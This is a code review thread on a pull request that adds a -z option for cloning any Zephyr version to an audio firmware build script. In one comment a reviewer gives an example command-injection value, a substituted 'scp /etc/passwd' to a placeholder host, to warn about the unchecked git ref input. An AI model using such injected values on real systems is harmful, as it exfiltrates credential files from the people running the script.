### PR TITLE
xtensa-build-zephyr: add new -z option to clone any Zephyr version 

### PR DESCRIPTION
**Pull request by marc-hb**
2 commits

1. cleanups, zero function change
2. new -z feature to clone any Zephyr version

### CODE REVIEW

File: scripts/xtensa-build-zephyr.sh [hunk 1]
```diff
@@ -39,11 +39,17 @@ Outputs in \$(west topdir)/build-*/ directories
 usage: $0 [options] [ platform(s) ] [ -- cmake arguments ]
 
        -a Build all platforms.
+
        -j n Set number of make build jobs for rimage. Jobs=#cores by default.
            Ignored by "west build".
+
```
Comment (lyakh) [inline scripts/xtensa-build-zephyr.sh:45]: will these two empty lines be printed with `-h`? Not sure they're useful / helpful?

File: scripts/xtensa-build-zephyr.sh [hunk 2]
```diff
@@ -39,11 +39,17 @@ Outputs in \$(west topdir)/build-*/ directories
...
        -k Path to a non-default rimage signing key.
-       -c recursively clones Zephyr inside sof before building.
-          Incompatible with -p. To stop after cloning Zephyr, do not
+
```
Comment (lyakh) [inline scripts/xtensa-build-zephyr.sh:47]: as well as this one

File: scripts/xtensa-build-zephyr.sh [hunk 3]
```diff
@@ -39,11 +39,17 @@ Outputs in \$(west topdir)/build-*/ directories
...
+       -c Using west, downloads inside this sof clone a new Zephyr
+          project with the required git repos. Creates a
+          sof/zephyrproject/modules/audio/sof symbolic link pointing
+          back at this sof clone.
+          Incompatible with -p. To stop after downloading Zephyr, do not
           pass any platform or cmake argument.
        -p Existing Zephyr project directory. Incompatible with -c.  If
```
Comment (lyakh) [inline scripts/xtensa-build-zephyr.sh:59]: seems to be well readable with no empty lines too

File: scripts/xtensa-build-zephyr.sh [hunk 4]
```diff
@@ -99,9 +104,19 @@ zephyr_fetch_and_switch()
...
+	# Or, we could have a default value:
+	# init_ref=${1:-811a09bd8305}
+
 	git clone --depth=5 https://github.com/zephyrproject-rtos/zephyr \
 	    "$WEST_TOP"/zephyr
 
+	# To keep things simple, this moves to a detached HEAD even when
+	# init_ref is a (remote) branch.
+	test -z "$init_ref" ||
+	    zephyr_fetch_and_switch     origin   "${init_ref}"
```
Comment (lyakh) [inline scripts/xtensa-build-zephyr.sh:118]: why multiple spaces before and between parameters?
Also: `zephyr_fetch_and_switch()` until now only dealt with hard-coded values, which were "assumed" to be correct. Now a reference can be provided on the command line. `zephyr_fetch_and_switch()` does
```
	  git fetch --depth=5 "$1" "$2"
	  git checkout FETCH_HEAD
```
so it doesn't check the return code from the first command. A failure will be captured by `set -e` so it should be fine. Also, this adds a possibility of specifying a "commit ID" as "$(scp /etc/passwd me@my.host:; echo main)" or similar, just something to be aware of, I guess.

**Review by dbaluta — APPROVED** [review]

**Review by lyakh — COMMENTED** [review]
looks good, but I'd use fewer spaces personally :-)

File: scripts/xtensa-build-zephyr.sh (hunk 1 above)
Comment (marc-hb) [reply scripts/xtensa-build-zephyr.sh:45]: Yes the newlines between each option are in the -h output, I found the earlier, packed output hard to read. I can remove them if you feel strongly about it (I don't)

File: scripts/xtensa-build-zephyr.sh (hunk 4 above)
Comment (marc-hb) [reply scripts/xtensa-build-zephyr.sh:118]: > why multiple spaces before and between parameters?

Align with the other examples below. Again I can remove if you insist.

`set -e` does abort the script here when `init_ref` is wrong, I tested that multiple times.

You can pass anything that is fetchable, I stated that in the `-h` message.

Comment (kv2019i) [reply scripts/xtensa-build-zephyr.sh:118]: I guess this won't be directly exposed to untrusted inputs, so I think the level of checks is fine.

**Review by kv2019i — APPROVED** [review]
I'll take no sides on the arguments on space (or lack of it)..

File: scripts/xtensa-build-zephyr.sh (hunk 4 above)
Comment (marc-hb) [reply scripts/xtensa-build-zephyr.sh:118]: If there is some situation where this exposed to untrusted input, you bet the attacker will make sure the `init_ref` is a valid one. Much, MUCH more to gain with a valid ref! See SECURITY WARNING 10 lines below.

**Comment by XiaoyunWu6666** [comment]
Good , it will be rather useful for the new build service .
We can use specific zephyr commit or use specific zephyr PR when building firmware with this PR

**Review by keqiaozhang — APPROVED** [review]

**Pull request merged**